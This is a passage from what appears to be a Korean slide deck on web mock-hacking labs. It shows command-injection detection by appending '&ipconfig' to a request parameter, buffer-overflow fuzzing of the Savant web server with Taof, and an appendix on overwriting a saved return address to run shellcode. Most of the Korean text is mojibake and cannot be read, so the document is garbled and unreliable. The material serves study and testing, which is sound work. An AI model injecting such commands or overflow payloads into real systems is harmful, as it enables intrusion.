33ํŽ˜์ด์Šค๋ถ ๊ณ„์ • ํƒˆ์ทจ ๋ฐฉ๋ฒ• ๊ฐœ๋…๋„(์ถœ์ฒ˜: ์ด์ŠคํŠธ์†Œํ”„ํŠธ) โ–ฒE-mail: isc0304@naver.com Writing by Ilsun Choi
2. ์‚ฌ๋ก€๋ถ„์„ > 6) URL Redirection
3. ๋ชจ์˜์‹ค์Šต
1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€
2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
34E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€
โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ ๋’ค์— ๋ช…๋ น์–ด ์‚ฝ์ž… ์‹œ ๋ช…๋ น์–ด๊ฐ€ ์‹คํ–‰๋˜๋Š” ์ทจ์•ฝ์ ์„ ํƒ์ง€ํ•œ๋‹ค.
โ€ข ์‚ฝ์ž… ํŒจํ„ด : &ipconfig
โ€ข ํƒ์ง€ ํŒจํ„ด : 255.255.25
โ€ข ์ž‘์„ฑํ•œ ํƒ์ง€ ํŒจํ„ด
35E-mail: isc0304@naver.com Writing by Ilsun Choi
โ€ข ํƒ์ง€ ๊ฒฐ๊ณผ
โ€ข ์„œ๋ฒ„์—์„œ netmask๋ฅผ
255.255.254๋กœ ๋ฐ”๊พผ ๊ฒƒ์œผ๋กœ ๋ณด์ž„
36E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€
3. Lab exercises > 2) Checking for buffer overflows
Reference: http://cafe.naver.com/sec/13325
1. Savant: a web server with a known BOF vulnerability.
2. Taof: a web-server fuzzer.
3. Demo video.
โ€ข ํ”„๋ก์‹œ ์„œ๋ฒ„๋ฅผ ์ƒ์„ฑํ•˜์—ฌ
์›น๋ธŒ๋ผ์šฐ์ €๋กœ ์ ‘์† ์‹œ ์š”์ฒญ ํŒจํ‚ท์„ ๊ธฐ๋ก
38E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
โ€ข Fuzzing Points๋ฅผ ์„ค์ •ํ•˜์—ฌ
Test ํ•  ๋ฌธ์ž์—ด ๊ธธ์ด๋ฅผ ์ •ํ•จ
โ€ข Savant ํ”„๋กœ๊ทธ๋žจ์„ Attachํ•˜์—ฌ
๋น„์ •์ƒ ์ข…๋ฃŒ ์‹œ
ํ”„๋กœ๊ทธ๋žจ ๋คํ”„๋ฅผ ์ถ”์ถœ
39E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
โ€ข ํ”„๋กœ๊ทธ๋žจ์ด ์ข…๋ฃŒ ์‹œ ์ถ”์ถœ๋œ ๋คํ”„
40E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
41
โ€ข Taof debugging data
โ€ข toaf fuzzer๋Š” BOF ์ ๊ฒ€ ์‹œ A๋ฅผ ์‚ฌ์šฉ
โ€ข 240 ๋ฌธ์ž์—ด ์‚ฝ์ž… ์ด์ „ ๊ฒฐ๊ณผ
๏ƒ File not found
โ€ข 255 ๋ฌธ์ž์—ด ์‚ฝ์ž… ์ดํ›„ ๊ฒฐ๊ณผ
๏ƒ Exception ๋ฐœ์ƒ
E-mail: isc0304@naver.com Writing by Ilsun Choi
3. ๋ชจ์˜์‹ค์Šต > 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€
๋ถ€๋ก. Direct RET BoF
๏ถ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ํ™˜๊ฒฝ์—๋งŒ ๊ฐ€๋Šฅํ•œ ๊ธฐ๋ฒ•์ด๋‹ค.
- Windows XP ๊ธ‰ ๊ธฐ๋ฐ˜(ASLR ๊ธฐ๋ฐ˜ OS๋Š” ์‹คํ–‰ํ•˜๊ธฐ ์–ด๋ ค์›€)
- GS-Cookie ๋ฏธ์„ค์ •
- DEP ๋ฏธ์„ค์ •
๏ถ ์ด๋ฏธ์ง€๋Š” ์•„๋ž˜ ๋ธ”๋กœ๊ทธ๋ฅผ ์ฐธ๊ณ ํ•˜์˜€๋‹ค.
http://fehead.tistory.com/201
42E-mail: isc0304@naver.com Writing by Ilsun Choi
• Stack changes when main() calls A().
• The slot numbered 98 in the diagram holds main()'s saved EIP (the return address).
• Slot 97 holds main()'s saved EBP.
• A()'s stack frame is then created below it.
• How C/C++ store a string: a start address is given and bytes are written upward until a null byte is reached. Because that write direction runs towards the saved EBP and RET, an over-long string can overwrite RET.
• Shellcode is supplied as the string and RET is overwritten: RET now points to the shellcode, so the shellcode executes on return.
• In the debugger, RET (EIP) and EBP both read "41414141", which confirms that they can be overwritten.
๋ถ€๋ก. Direct RET BoF
์ฐธ๊ณ ๋ฌธํ—Œ
โ€ข http://fehead.tistory.com/201
โ€ข http://cafe.naver.com/sec/13325
โ€ข http://www.boannews.com/media/view.asp?idx=45812
โ€ข ์›น ๋ชจ์˜ํ•ดํ‚น๊ณผ ์‹œํ์–ด ์ฝ”๋”ฉ ์ง„๋‹จ ๊ฐ€์ด๋“œ ์ตœ๊ฒฝ์ฒ  ์™ธ ์ง€์Œ
E-mail: isc0304@naver.com Writing by Ilsun Choi 49
